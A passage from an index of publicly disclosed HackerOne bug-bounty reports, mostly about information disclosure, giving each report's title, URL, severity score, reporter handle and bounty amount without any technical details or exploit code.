UnResolved ChangeSet are Visible to Public That also Causes Information Disclosure
#### URL
https://hackerone.com/reports/282843
#### Severity score
null
#### Reporter
hackerwahab
### Bounty paid
null
---
### Title
Line feed injection in get request leads AWS S3 Bucket information disclosure
#### URL
https://hackerone.com/reports/460928
#### Severity score
6.1
#### Reporter
aty
### Bounty paid
null
---
### Title
Know whether private project name exists or not within a group using link comments
#### URL
https://hackerone.com/reports/495497
#### Severity score
null
#### Reporter
ashish_r_padelkar
### Bounty paid
$300
---
### Title
Public and secret api key leaked via omise github repo(owned by omise)
#### URL
https://hackerone.com/reports/508024
#### Severity score
null
#### Reporter
noobwalid
### Bounty paid
null
---
### Title
PII leakage due to scrceenshot of health records
#### URL
https://hackerone.com/reports/693933
#### Severity score
null
#### Reporter
alyssa_herrera
### Bounty paid
null
---
### Title
Insecure Local Data Storage : Application stores data using a binary sqlite database
#### URL
https://hackerone.com/reports/57918
#### Severity score
null
#### Reporter
bugwrangler
### Bounty paid
$50
---
### Title
SVN repository
#### URL
https://hackerone.com/reports/622113
#### Severity score
null
#### Reporter
linkks
### Bounty paid
null
---
### Title
SAUCE Access_key and User_name leaked in Travis CI build logs
#### URL
https://hackerone.com/reports/238890
#### Severity score
null
#### Reporter
an0n-j
### Bounty paid
null
---
### Title
Apache Server-Status Detected
#### URL
https://hackerone.com/reports/247002
#### Severity score
null
#### Reporter
linkks
### Bounty paid
null
---
### Title
Full path disclosure vulnerability at http://corporate.olx.ph
#### URL
https://hackerone.com/reports/171048
#### Severity score
null
#### Reporter
juliocesar
### Bounty paid
null
---
### Title
Lack of cross-origin request blocking allows leaking of sensitive information on several endpoints
#### URL
https://hackerone.com/reports/350739
#### Severity score
null
#### Reporter
herrera
### Bounty paid
null
---
### Title
Hackerone Email Addresses Enumeration
#### URL
https://hackerone.com/reports/2429
#### Severity score
null
#### Reporter
techintheprovince
### Bounty paid
null
---
### Title
HackerOne Private Programs users disclosure and de-anonymous-ize
#### URL
https://hackerone.com/reports/92716
#### Severity score
null
#### Reporter
symbiansymoh
### Bounty paid
null
---
### Title
Information Disclosure through .DS_Store in ██████████
#### URL
https://hackerone.com/reports/142549
#### Severity score
null
#### Reporter
lewerkun
### Bounty paid
$560
---
### Title
Bug Report
#### URL
https://hackerone.com/reports/142940
#### Severity score
null
#### Reporter
1337_inj3c70r
### Bounty paid
$50
---
### Title
Stored credentials instantly autofilled within sandboxed iframes
#### URL
https://hackerone.com/reports/650085
#### Severity score
null
#### Reporter
alesandroortiz
### Bounty paid
null
---
### Title
Starbucks China Android app cloud storage service leaks a credential.
#### URL
https://hackerone.com/reports/440629
#### Severity score
null
#### Reporter
k3mlol
### Bounty paid
$500
---
### Title
сервант статус
#### URL
https://hackerone.com/reports/452010
#### Severity score
0
#### Reporter
linkks
### Bounty paid
null
---
### Title
Coinbase Android Application - Bitcoin Wallet Leaks OAuth Response Code
#### URL
https://hackerone.com/reports/5314
#### Severity score
null
#### Reporter
prakharprasad
### Bounty paid
$1,000
---
### Title
[www.yoti.com] Wordpress user admin information discloure
#### URL
https://hackerone.com/reports/727870
#### Severity score
null
#### Reporter
lamscun
### Bounty paid
$500
---
### Title
Public Github Repo Leaking Internal Credentials Leading To DiscoveryIQ Docker Access
#### URL
https://hackerone.com/reports/631348
#### Severity score
null
#### Reporter
vinothkumar
### Bounty paid
null
---
### Title
Guests Will Disclose the Private Project Full Activity Via Project Activity Feeds
#### URL
https://hackerone.com/reports/491319
#### Severity score
null
#### Reporter
uzkova
### Bounty paid
null
---
### Title
[bot.brew.sh] Full Path Disclosure
#### URL
https://hackerone.com/reports/222096
#### Severity score
5.3
#### Reporter
zephrfish
### Bounty paid
null
---
### Title
[sj.my.com] Source Code Disclosure /.svn/wc.db
#### URL
https://hackerone.com/reports/410789
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
null
---
### Title
Enumerating userIDs with phone numbers
#### URL
https://hackerone.com/reports/128723
#### Severity score
null
#### Reporter
r0t1v
### Bounty paid
null
---
### Title
Application error message
#### URL
https://hackerone.com/reports/147577
#### Severity score
null
#### Reporter
dr_dragon
### Bounty paid
$100
---
### Title
Private, embeddable videos leaks data through Facebook & Open Graph
#### URL
https://hackerone.com/reports/121919
#### Severity score
null
#### Reporter
tomash
### Bounty paid
$100
---
### Title
uninitilized server memory disclosure via ImageMagick in my.mail.ru and cloud.mail.ru
#### URL
https://hackerone.com/reports/251732
#### Severity score
null
#### Reporter
neex
### Bounty paid
$750
---
### Title
Android content provider exposes password-protected share password hashes
#### URL
https://hackerone.com/reports/242727
#### Severity score
null
#### Reporter
icewater
### Bounty paid
$75
---
### Title
Leaking password reset token via referrer from external Twitter share button
#### URL
https://hackerone.com/reports/244434
#### Severity score
null
#### Reporter
prateek_0490
### Bounty paid
null
---
### Title
Information / sensitive data disclosure on some endpoints
#### URL
https://hackerone.com/reports/273726
#### Severity score
null
#### Reporter
europa
### Bounty paid
null
---
### Title
Employee's GitHub Token Found In Travis CI Build Logs
#### URL
https://hackerone.com/reports/496937
#### Severity score
null
#### Reporter
karimpwnz
### Bounty paid
$5,000
---
### Title
Internal IP Address Disclosed
#### URL
https://hackerone.com/reports/707228
#### Severity score
null
#### Reporter
ahmd_halabi
### Bounty paid
null
---
### Title
Misconfiguration in 2 factor allows sensitive data expose
#### URL
https://hackerone.com/reports/119129
#### Severity score
null
#### Reporter
codequick
### Bounty paid
$500
---
### Title
Application error message
#### URL
https://hackerone.com/reports/106384
#### Severity score
null
#### Reporter
linkks
### Bounty paid
$20
---
### Title
Open FTP server on a DoD system
#### URL
https://hackerone.com/reports/192321
#### Severity score
null
#### Reporter
alyssa_herrera
### Bounty paid
null
---
### Title
Private partial disclosure of h1 infrastructure
#### URL
https://hackerone.com/reports/283361
#### Severity score
0
#### Reporter
exadmin
### Bounty paid
null
---
### Title
An “algobot”-s GitHub access token was leaked
#### URL
https://hackerone.com/reports/212067
#### Severity score
null
#### Reporter
sainaen
### Bounty paid
$100
---
### Title
Partial disclosure of Private Videos through data-mediabook attribute information leak
#### URL
https://hackerone.com/reports/228495
#### Severity score
null
#### Reporter
sp1d3rs
### Bounty paid
$250
---
### Title
Directory traversal attack in view resolver
#### URL
https://hackerone.com/reports/3370
#### Severity score
null
#### Reporter
lautis
### Bounty paid
$1,500
---
### Title
Information Disclosure (can access all ███s) within ███████ view █████████ Portal
#### URL
https://hackerone.com/reports/484377
#### Severity score
null
#### Reporter
archang31
### Bounty paid
null
---
### Title
Test Page available with Server details on /r/test (viestinta.lahitapiola.fi)
#### URL
https://hackerone.com/reports/201901
#### Severity score
null
#### Reporter
yonm13
### Bounty paid
$50
---
### Title
scfbp.tng.mail.ru: Heartbleed
#### URL
https://hackerone.com/reports/49139
#### Severity score
null
#### Reporter
isox
### Bounty paid
$150
---
### Title
Information disclosure
#### URL
https://hackerone.com/reports/350432
#### Severity score
2.9
#### Reporter
b258ea62bf297b02afa9854
### Bounty paid
null
---
### Title
Use of uninitialized value in ftp_getrc_msg method of mod_proxy_ftp.c
#### URL
https://hackerone.com/reports/838685
#### Severity score
3.7
#### Reporter
chamal
### Bounty paid
$100
---
### Title
[http://www.informatica.com]- info disclosure
#### URL
https://hackerone.com/reports/311058
#### Severity score
null
#### Reporter
modam3r5
### Bounty paid
null
---
### Title
GET request to accounts.json on support site leaks the root account license key and the browser license key to a restricted user
#### URL
https://hackerone.com/reports/479135
#### Severity score
null
#### Reporter
jon_bottarini
### Bounty paid
$750
---
### Title
Account hijacking possible through ADB backup feature
#### URL
https://hackerone.com/reports/12617
#### Severity score
null
#### Reporter
trotmaster
### Bounty paid
null
---
### Title
gitlab-workhorse bypass in Gitlab::Middleware::Multipart allowing files in `allowed_paths` to be read
#### URL
https://hackerone.com/reports/850447
#### Severity score
null
#### Reporter
vakzz
### Bounty paid
$10,000
---
### Title
Information disclosure (No rate limting in forgot password & other login)
#### URL
https://hackerone.com/reports/91343
#### Severity score
null
#### Reporter
protector47
### Bounty paid
$50
---
### Title
Amazon Bucket Accessible (http://legalrobot.s3.amazonaws.com/)
#### URL
https://hackerone.com/reports/163599
#### Severity score
null
#### Reporter
gorkhali
### Bounty paid
null
---
### Title
Wordpress directories/files visible to internet
#### URL
https://hackerone.com/reports/785866
#### Severity score
null
#### Reporter
tefa_
### Bounty paid
null
---
### Title
Malicious Server can force read any file on clients system with default configuration in MySQL Clients
#### URL
https://hackerone.com/reports/171593
#### Severity score
null
#### Reporter
tarq
### Bounty paid
null
---
### Title
Information Disclosure [ https://curious.ru/api/submissions ]
#### URL
https://hackerone.com/reports/703086
#### Severity score
null
#### Reporter
elmahdi
### Bounty paid
$250
---
### Title
Submitted reports state logs leakage
#### URL
https://hackerone.com/reports/306733
#### Severity score
null
#### Reporter
666reda
### Bounty paid
null
---
### Title
Information Disclosure
#### URL
https://hackerone.com/reports/143064
#### Severity score
null
#### Reporter
mugeesahmed
### Bounty paid
$50
---
### Title
Requesting unknown file type returns Ruby object w/ address
#### URL
https://hackerone.com/reports/109420
#### Severity score
null
#### Reporter
run
### Bounty paid
null
---
### Title
Secret API Key Leakage via Query String
#### URL
https://hackerone.com/reports/276041
#### Severity score
null
#### Reporter
luckydivino
### Bounty paid
$500
---
### Title
Server Side Browsing - localhost open port enumeration
#### URL
https://hackerone.com/reports/122697
#### Severity score
null
#### Reporter
aiacobelli
### Bounty paid
null
---
### Title
Users able to set video url for unpublished words and able to see the name of unpublished words
#### URL
https://hackerone.com/reports/486837
#### Severity score
null
#### Reporter
d3f4u17
### Bounty paid
null
---
### Title
EXIF Geolocation Data Not Stripped From Uploaded Images
#### URL
https://hackerone.com/reports/615336
#### Severity score
2
#### Reporter
the_predator
### Bounty paid
$50
---
### Title
Gain access to any user's email address
#### URL
https://hackerone.com/reports/42154
#### Severity score
null
#### Reporter
corb3nik
### Bounty paid
null
---
### Title
IDOR - Accessing other user's attachements via PUT /appsuite/api/files?action=saveAs
#### URL
https://hackerone.com/reports/204984
#### Severity score
null
#### Reporter
inhibitor181
### Bounty paid
$888
---
### Title
Disclosure of h1 challenges name through the calendar
#### URL
https://hackerone.com/reports/488643
#### Severity score
3.8
#### Reporter
rijalrojan
### Bounty paid
$500
---
### Title
Ability to enumerate private programs using SAML
#### URL
https://hackerone.com/reports/167828
#### Severity score
null
#### Reporter
ayoubfathi_
### Bounty paid
null
---
### Title
Secret_key in GitHub
#### URL
https://hackerone.com/reports/926093
#### Severity score
null
#### Reporter
fr0gz0x
### Bounty paid
null
---
### Title
Information Disclosure on inside.gratipay.com
#### URL
https://hackerone.com/reports/267213
#### Severity score
null
#### Reporter
malek
### Bounty paid
null
---
### Title
Uninitialized variable error message leaks information
#### URL
https://hackerone.com/reports/7915
#### Severity score
null
#### Reporter
melvin
### Bounty paid
null
---
### Title
astrumnival.com subdomain
#### URL
https://hackerone.com/reports/471941
#### Severity score
null
#### Reporter
linkks
### Bounty paid
null
---
### Title
User email enumuration using Gmail
#### URL
https://hackerone.com/reports/90308
#### Severity score
null
#### Reporter
paulos_
### Bounty paid
$100
---
### Title
information disclosure
#### URL
https://hackerone.com/reports/13939
#### Severity score
null
#### Reporter
niks
### Bounty paid
null
---
### Title
Reflected XSS in https://www.█████/
#### URL
https://hackerone.com/reports/950700
#### Severity score
null
#### Reporter
nirajgautamit
### Bounty paid
null
---
### Title
Browser Self XSS Protection not implemented
#### URL
https://hackerone.com/reports/400781
#### Severity score
null
#### Reporter
hallaleen
### Bounty paid
null
---
### Title
[sputnik.mail.ru] Publicly accessible GIT directory
#### URL
https://hackerone.com/reports/239482
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
null
---
### Title
s2.owncloud.com: SSL Session cookie without secure flag set
#### URL
https://hackerone.com/reports/83856
#### Severity score
null
#### Reporter
ashesh
### Bounty paid
null
---
### Title
[h1-2006 CTF] Payments for May have been processed!
#### URL
https://hackerone.com/reports/894165
#### Severity score
null
#### Reporter
vakzz
### Bounty paid
null
---
### Title
Old titles are not hidden in reports with limited disclosure
#### URL
https://hackerone.com/reports/144129
#### Severity score
null
#### Reporter
jthetechguy
### Bounty paid
$500
---
### Title
Stealing users' facebook access tokens - kitcrm.com
#### URL
https://hackerone.com/reports/211477
#### Severity score
null
#### Reporter
zombiehelp54
### Bounty paid
$500
---
### Title
Arbitrary file read via ffmpeg HLS parser at https://www.flickr.com/photos/upload
#### URL
https://hackerone.com/reports/487008
#### Severity score
9.9
#### Reporter
asad0x01_
### Bounty paid
$2,000
---
### Title
Users enumeration is possible through cycling through recurring[client_id] argument value.
#### URL
https://hackerone.com/reports/152669
#### Severity score
null
#### Reporter
0xamir
### Bounty paid
$350
---
### Title
Flash Sandbox Bypass
#### URL
https://hackerone.com/reports/15362
#### Severity score
null
#### Reporter
kinine
### Bounty paid
$3,000
---
### Title
Potentially Sensitive Information on GitHub
#### URL
https://hackerone.com/reports/143438
#### Severity score
null
#### Reporter
wkcaj
### Bounty paid
$1,500
---
### Title
Wordpress: Directory Traversal / Denial of Serivce
#### URL
https://hackerone.com/reports/163421
#### Severity score
null
#### Reporter
tbehroz
### Bounty paid
null
---
### Title
Information regarding trips from other users
#### URL
https://hackerone.com/reports/127161
#### Severity score
null
#### Reporter
maluko
### Bounty paid
$5,000
---
### Title
Banner Grabbing - Apache Server Version Disclosure
#### URL
https://hackerone.com/reports/348801
#### Severity score
null
#### Reporter
kistimat
### Bounty paid
null
---
### Title
local file disclosure via FFmpeg hls processing
#### URL
https://hackerone.com/reports/226756
#### Severity score
null
#### Reporter
neex
### Bounty paid
$1,000
---
### Title
Email enumeration of users
#### URL
https://hackerone.com/reports/221869
#### Severity score
null
#### Reporter
pappan
### Bounty paid
null
---
### Title
Legal Robot AWS S3 Bucket Directory Listing
#### URL
https://hackerone.com/reports/194142
#### Severity score
null
#### Reporter
japz
### Bounty paid
null
---
### Title
Disclosure of sensitive information through Google Cloud Storage bucket
#### URL
https://hackerone.com/reports/176013
#### Severity score
null
#### Reporter
koenrh
### Bounty paid
$500
---
### Title
Email address of any user can be queried on Report Invitation GraphQL type when username is known
#### URL
https://hackerone.com/reports/792927
#### Severity score
8.3
#### Reporter
msdian7
### Bounty paid
$8,500
---
### Title
Full Path Disclosure in password lock
#### URL
https://hackerone.com/reports/115422
#### Severity score
null
#### Reporter
supernatural
### Bounty paid
null
---
### Title
User Enumeration.
#### URL
https://hackerone.com/reports/165894
#### Severity score
null
#### Reporter
leet-boy
### Bounty paid
null
---
### Title
Open FTP on ███
#### URL
https://hackerone.com/reports/197976
#### Severity score
null
#### Reporter
alyssa_herrera
### Bounty paid
null
---
### Title
nginx version disclosure on downloads.gratipay.com
#### URL
https://hackerone.com/reports/157507
#### Severity score
null
#### Reporter
footstep
### Bounty paid
null
---
### Title
This Github Repository Seems Leaking "nino.samokat.ru" Source Code
#### URL
https://hackerone.com/reports/973658
#### Severity score
null
#### Reporter
gevakun
### Bounty paid
$150
---
### Title
Full Path Disclosure
#### URL
https://hackerone.com/reports/85201
#### Severity score
null
#### Reporter
ishahriyar
### Bounty paid
$25
---
### Title
Full path Disclosure in Rockstargames.com██████████
#### URL
https://hackerone.com/reports/210572
#### Severity score
null
#### Reporter
pappan
### Bounty paid
$150
---
### Title
User Enumeration and Information Disclosure
#### URL
https://hackerone.com/reports/155578
#### Severity score
null
#### Reporter
pl_bounty
### Bounty paid
null
---
### Title
apps.owncloud.com: Path Disclosure
#### URL
https://hackerone.com/reports/83801
#### Severity score
null
#### Reporter
ashesh
### Bounty paid
null
---
### Title
Verbose error message reveals internal system hostnames, protols and used ports (yrityspalvelu.tapiola.fi)
#### URL
https://hackerone.com/reports/294464
#### Severity score
null
#### Reporter
muon4
### Bounty paid
$50
---
### Title
Directory Listing of all the resource files of olx.com.eg
#### URL
https://hackerone.com/reports/175760
#### Severity score
5.3
#### Reporter
mohamedsherif
### Bounty paid
null
---
### Title
Sensitive Information disclosure Through Config File
#### URL
https://hackerone.com/reports/775123
#### Severity score
null
#### Reporter
a1c3venom
### Bounty paid
null
---
### Title
Android SDK - CREATE_REQUEST broascast is unprotected
#### URL
https://hackerone.com/reports/180349
#### Severity score
6.8
#### Reporter
bagipro
### Bounty paid
$100
---
### Title
Possible to View Driver Waybill via Driver UUID
#### URL
https://hackerone.com/reports/127087
#### Severity score
null
#### Reporter
shmoo
### Bounty paid
$3,000
---
### Title
China – Limited Partner PII Regarding Work Scheduling via Unauthenticated API Endpoint
#### URL
https://hackerone.com/reports/659248
#### Severity score
null
#### Reporter
0xpatrik
### Bounty paid
$4,000
---
### Title
files likes of README.md is public
#### URL
https://hackerone.com/reports/31255
#### Severity score
null
#### Reporter
pulkit_pandey
### Bounty paid
null
---
### Title
File name/folder enumeration.
#### URL
https://hackerone.com/reports/35823
#### Severity score
null
#### Reporter
nahamsec
### Bounty paid
null
---
### Title
[https://life.informatica.com] - information disclose
#### URL
https://hackerone.com/reports/312292
#### Severity score
null
#### Reporter
modam3r5
### Bounty paid
null
---
### Title
Multiple sub domain are vulnerable because of leaking full path
#### URL
https://hackerone.com/reports/62778
#### Severity score
null
#### Reporter
digitalsurgn
### Bounty paid
$150
---
### Title
User guessing/enumeration at https://app.c2fo.com/api/password-reset
#### URL
https://hackerone.com/reports/5688
#### Severity score
null
#### Reporter
internetwache
### Bounty paid
null
---
### Title
Exposing hackerone users personally identifiable information by abusing sandbox with swag reward enabled
#### URL
https://hackerone.com/reports/357576
#### Severity score
null
#### Reporter
japz
### Bounty paid
null
---
### Title
██████ Authenticated User Data Disclosure
#### URL
https://hackerone.com/reports/587214
#### Severity score
null
#### Reporter
deputy
### Bounty paid
null
---
### Title
Able to comment/view in others support ticket at https://en.instagram-brand.com/requests/dashboard
#### URL
https://hackerone.com/reports/1007988
#### Severity score
null
#### Reporter
ajay_saycure
### Bounty paid
$200
---
### Title
Information disclosure vulnerability on a DoD website
#### URL
https://hackerone.com/reports/210525
#### Severity score
null
#### Reporter
twicedi
### Bounty paid
null
---
### Title
sdrc.starbucks.com - Information Disclosure via unsecured attachment directory
#### URL
https://hackerone.com/reports/769016
#### Severity score
9.8
#### Reporter
l00ph0le
### Bounty paid
$4,000
---
### Title
Найден build.sh в webagent.mail.ru
#### URL
https://hackerone.com/reports/418294
#### Severity score
0
#### Reporter
artebels
### Bounty paid
$100
---
### Title
latest_activity_id and latest_activity_at may disclose information about internal activities to unauthorized users
#### URL
https://hackerone.com/reports/724944
#### Severity score
3.4
#### Reporter
egrep
### Bounty paid
$1,000
---
### Title
Mail.ru for Android Content Provider Vulnerability
#### URL
https://hackerone.com/reports/143280
#### Severity score
null
#### Reporter
murthy68
### Bounty paid
$250
---
### Title
Sensitive Information Disclosure https://cards-dev.twitter.com
#### URL
https://hackerone.com/reports/268888
#### Severity score
null
#### Reporter
hassham
### Bounty paid
$280
---
### Title
Able to intercept app Traffic after choosing up the Secured Connection using SSL (HTTPS)
#### URL
https://hackerone.com/reports/64731
#### Severity score
null
#### Reporter
bugwrangler
### Bounty paid
$100
---
### Title
[Not just a server configuration issue] Full Path Disclosure
#### URL
https://hackerone.com/reports/153628
#### Severity score
null
#### Reporter
ahsan
### Bounty paid
null
---
### Title
СКР инжект
#### URL
https://hackerone.com/reports/520871
#### Severity score
null
#### Reporter
linkks
### Bounty paid
$500
---
### Title
Небезопасная схема выдачи номера карты QVC (возможно, также QVV и QVP)
#### URL
https://hackerone.com/reports/87586
#### Severity score
null
#### Reporter
postboy
### Bounty paid
$200
---
### Title
Information leakage on django.aspen.io
#### URL
https://hackerone.com/reports/272982
#### Severity score
null
#### Reporter
rey_7
### Bounty paid
null
---
### Title
Full Path Disclosure on gmchat.gm.com
#### URL
https://hackerone.com/reports/111999
#### Severity score
null
#### Reporter
rmashhoon
### Bounty paid
null
---
### Title
IRC-Bot exposes information
#### URL
https://hackerone.com/reports/222870
#### Severity score
null
#### Reporter
luke081515
### Bounty paid
$300
---
### Title
Timing attack towards endpoints on the web without CSRF
#### URL
https://hackerone.com/reports/348168
#### Severity score
2.9
#### Reporter
b258ea62bf297b02afa9854
### Bounty paid
null
---
### Title
Unexpected array leaks information about the system
#### URL
https://hackerone.com/reports/7888
#### Severity score
null
#### Reporter
melvin
### Bounty paid
null
---
### Title
[Cross-domain Referer leakage] Password reset token leakage via referer
#### URL
https://hackerone.com/reports/253448
#### Severity score
null
#### Reporter
r3y
### Bounty paid
$20
---
### Title
Directory listing - i am able to download all php_agent archive
#### URL
https://hackerone.com/reports/207384
#### Severity score
null
#### Reporter
cj862530
### Bounty paid
null
---
### Title
Requesting Show CheckIn Alert for Non Friend User
#### URL
https://hackerone.com/reports/174882
#### Severity score
null
#### Reporter
vinesh1989
### Bounty paid
$500
---
### Title
Full Path Disclosure
#### URL
https://hackerone.com/reports/47876
#### Severity score
null
#### Reporter
c37hun
### Bounty paid
null
---
### Title
Missing authorization checks leading to the exposure of ubernihao.com administrator accounts
#### URL
https://hackerone.com/reports/154762
#### Severity score
null
#### Reporter
issam_rabhi
### Bounty paid
$3,000
---
### Title
Critical information disclosure at https://█████████
#### URL
https://hackerone.com/reports/200079
#### Severity score
null
#### Reporter
juliocesar
### Bounty paid
null
---
### Title
express config leaking stacktrace
#### URL
https://hackerone.com/reports/205069
#### Severity score
4
#### Reporter
prbln
### Bounty paid
$50
---
### Title
Emails of invited collaborators are disclosed in full in payload for report participants
#### URL
https://hackerone.com/reports/269230
#### Severity score
3.4
#### Reporter
flashdisk
### Bounty paid
$1,500
---
### Title
Information disclosure of user by email using buy widget
#### URL
https://hackerone.com/reports/176002
#### Severity score
null
#### Reporter
cablej
### Bounty paid
$100
---
### Title
external entity expansion in Apache POI
#### URL
https://hackerone.com/reports/25537
#### Severity score
null
#### Reporter
mohaab007
### Bounty paid
null
---
### Title
Mapbox Android SDK uses Broadcast Receiver instead of Local Broadcast Manager
#### URL
https://hackerone.com/reports/192886
#### Severity score
null
#### Reporter
mishre
### Bounty paid
$1,000
---
### Title
Full Path Disclosure (FPD) in www.localize.im
#### URL
https://hackerone.com/reports/9256
#### Severity score
null
#### Reporter
faisalahmed
### Bounty paid
null
---
### Title
Password reset token leakage through referrer at https://app.c2fo.com/password/reset/
#### URL
https://hackerone.com/reports/5691
#### Severity score
null
#### Reporter
internetwache
### Bounty paid
null
---
### Title
Nginx server version disclosure
#### URL
https://hackerone.com/reports/182046
#### Severity score
null
#### Reporter
japz
### Bounty paid
null
---
### Title
[mena.starbucks.com] Laravel App Log & Configuration Disclosure.
#### URL
https://hackerone.com/reports/401098
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
$500
---
### Title
SSRF on synthetics.newrelic.com permitting access to sensitive data
#### URL
https://hackerone.com/reports/141682
#### Severity score
null
#### Reporter
ylujion
### Bounty paid
null
---
### Title
Private leaderboard owner email disclosure when sending invites
#### URL
https://hackerone.com/reports/969988
#### Severity score
null
#### Reporter
nrekany
### Bounty paid
null
---
### Title
[lk-cdn.3igames.mail.ru] apc.php
#### URL
https://hackerone.com/reports/277664
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
null
---
### Title
Read Application Name , Subscribers Count
#### URL
https://hackerone.com/reports/184057
#### Severity score
null
#### Reporter
cyriac
### Bounty paid
null
---
### Title
Notification of previous signed out user leakage.
#### URL
https://hackerone.com/reports/26395
#### Severity score
null
#### Reporter
siddiki
### Bounty paid
null
---
### Title
https://voip.agent.mail.ru/phpinfo.php
#### URL
https://hackerone.com/reports/63075
#### Severity score
null
#### Reporter
isox
### Bounty paid
null
---
### Title
Partial password leak over DNS on HTTP redirect
#### URL
https://hackerone.com/reports/874778
#### Severity score
5.5
#### Reporter
mszpl
### Bounty paid
$400
---
### Title
Misconfigured Bucket [razer-assets2] https://assets2.razerzone.com/
#### URL
https://hackerone.com/reports/756703
#### Severity score
null
#### Reporter
zelzal
### Bounty paid
$250
---
### Title
Unrestricted View to People’s Web Invoices Data without knowing the Unique Hash
#### URL
https://hackerone.com/reports/152992
#### Severity score
null
#### Reporter
abcdefghijklmnopqrstuvwxyzabc
### Bounty paid
null
---
### Title
/accounts/USERID.json file is left open for Restricted User of organization disclosing Owners's Mobile Number and "billing_info, cc_email"
#### URL
https://hackerone.com/reports/221250
#### Severity score
null
#### Reporter
peeper35
### Bounty paid
null
---
### Title
Disclosure of private programs that have an "external" page on HackerOne
#### URL
https://hackerone.com/reports/124611
#### Severity score
null
#### Reporter
saeedhashem
### Bounty paid
$500
---
### Title
Checking whether user liked the media or not even when you are blocked
#### URL
https://hackerone.com/reports/111417
#### Severity score
null
#### Reporter
vraj
### Bounty paid
$100
---
### Title
Port and service scanning on localhost due to improper URL validation.
#### URL
https://hackerone.com/reports/773313
#### Severity score
6.3
#### Reporter
vshmuk
### Bounty paid
null
---
### Title
Information Disclosure
#### URL
https://hackerone.com/reports/330860
#### Severity score
null
#### Reporter
alyssa_herrera
### Bounty paid
null
---
### Title
Flickr: Invitations disclosure (resend feature)
#### URL
https://hackerone.com/reports/1533
#### Severity score
null
#### Reporter
d4d1a179c0f3
### Bounty paid
$750
---
### Title
Information leakage - Private reports cached by Google
#### URL
https://hackerone.com/reports/80118
#### Severity score
null
#### Reporter
tisisire
### Bounty paid
null
---
### Title
https://www.legalrobot.com/
#### URL
https://hackerone.com/reports/228156
#### Severity score
null
#### Reporter
caesar302
### Bounty paid
null
---
### Title
Generating Unlimited Free Travel Gift Invites | IDOR
#### URL
https://hackerone.com/reports/49499
#### Severity score
null
#### Reporter
shamrocksu88
### Bounty paid
null
---
### Title
directory listing in https://demo.owncloud.org/doc/
#### URL
https://hackerone.com/reports/105149
#### Severity score
null
#### Reporter
ba4fe4ca95021d367f8a574
### Bounty paid
null
---
### Title
Transitioning a Private Program to Public Does Not Clear Previously Private Updates to Hackers
#### URL
https://hackerone.com/reports/210190
#### Severity score
5.3
#### Reporter
0xffe4
### Bounty paid
$500
---
### Title
Opcode Cache
#### URL
https://hackerone.com/reports/308355
#### Severity score
null
#### Reporter
linkks
### Bounty paid
$300
---
### Title
Private key "tron" leaked via Travis CI Log
#### URL
https://hackerone.com/reports/472651
#### Severity score
null
#### Reporter
rhynorater
### Bounty paid
$1,000
---
### Title
SMTP user enumeration via mail.zendesk.com
#### URL
https://hackerone.com/reports/193314
#### Severity score
null
#### Reporter
geeknik
### Bounty paid
$50
---
### Title
User Information sent to client through websockets
#### URL
https://hackerone.com/reports/168223
#### Severity score
null
#### Reporter
archers123
### Bounty paid
null
---
### Title
Image Injection on www.rockstargames.com/screenshot-viewer/responsive/image may allow facebook oauth token theft.
#### URL
https://hackerone.com/reports/497655
#### Severity score
6.8
#### Reporter
netfuzzer
### Bounty paid
$500
---
### Title
Раскрытие чувствительной информации composer.lock docker-compose.yml
#### URL
https://hackerone.com/reports/714186
#### Severity score
null
#### Reporter
pisarenko
### Bounty paid
$100
---
### Title
STAFF "No-Permissions" on the Store can retrieve the details Order via exchangeReceiptSend
#### URL
https://hackerone.com/reports/917875
#### Severity score
6.9
#### Reporter
langduvnsec
### Bounty paid
$1,000
---
### Title
пхпинфо
#### URL
https://hackerone.com/reports/622118
#### Severity score
null
#### Reporter
linkks
### Bounty paid
null
---
### Title
https://newsletter.nextcloud.com Directory listening and Information Disclosure
#### URL
https://hackerone.com/reports/145603
#### Severity score
null
#### Reporter
mefkan
### Bounty paid
null
---
### Title
Full Path Disclosure / Info Disclosure in Creating New Group
#### URL
https://hackerone.com/reports/8090
#### Severity score
null
#### Reporter
faisalahmed
### Bounty paid
null
---
### Title
Server Version Of https://www.olx.ph/
#### URL
https://hackerone.com/reports/197238
#### Severity score
null
#### Reporter
jaypogzz
### Bounty paid
null
---
### Title
Private IP addresses Disclosure
#### URL
https://hackerone.com/reports/908880
#### Severity score
null
#### Reporter
iwiwwooqo
### Bounty paid
null
---
### Title
Раскрытие путей сервера за счёт неопределённого индекса в сценарии /home/berserk-online.com/public_html/forum/Themes/berserker/Profile.template.php
#### URL
https://hackerone.com/reports/12794
#### Severity score
null
#### Reporter
bigbear
### Bounty paid
null
---
### Title
Server version disclosure
#### URL
https://hackerone.com/reports/167041
#### Severity score
null
#### Reporter
top
### Bounty paid
null
---
### Title
Lack of rate limiting on get.uber.com leads to enumeration of promotion codes and estimation of a lower bound on the number of Uber drivers
#### URL
https://hackerone.com/reports/125200
#### Severity score
null
#### Reporter
ddworken
### Bounty paid
$3,000
---
### Title
Enumeration of subscribed users and unauthenticated email unsubscriptions on https://newsletter.nextcloud.com/?p=unsubscribe
#### URL
https://hackerone.com/reports/145396
#### Severity score
null
#### Reporter
strukt
### Bounty paid
null
---
### Title
CVE-2020-14179 on https://jira.theendlessweb.com/secure/QueryComponent!Default.jspa leads to information disclosure
#### URL
https://hackerone.com/reports/1003980
#### Severity score
null
#### Reporter
nagli
### Bounty paid
null
---
### Title
Researcher gets email updates on a private program after he/she quits that program.
#### URL
https://hackerone.com/reports/174449
#### Severity score
3.5
#### Reporter
sasi2103
### Bounty paid
null
---
### Title
Sensitive information disclosure
#### URL
https://hackerone.com/reports/504122
#### Severity score
null
#### Reporter
l34r00t
### Bounty paid
null
---
### Title
CSV Injection in business.uber.com
#### URL
https://hackerone.com/reports/126109
#### Severity score
null
#### Reporter
ddworken
### Bounty paid
$1,000
---
### Title
Kovri: potential buffer over-read in garlic clove handling + I2NP message creation
#### URL
https://hackerone.com/reports/291489
#### Severity score
7.7
#### Reporter
aerodudrizzt
### Bounty paid
null
---
### Title
Proxy discloses internal web servers
#### URL
https://hackerone.com/reports/1409
#### Severity score
null
#### Reporter
jobert
### Bounty paid
null
---
### Title
(FULL PATH DISCLOSURE) Unknown MySQL server host 'shardm-reader.chi2.shopify.io'
#### URL
https://hackerone.com/reports/157876
#### Severity score
null
#### Reporter
jamesclyde
### Bounty paid
$500
---
### Title
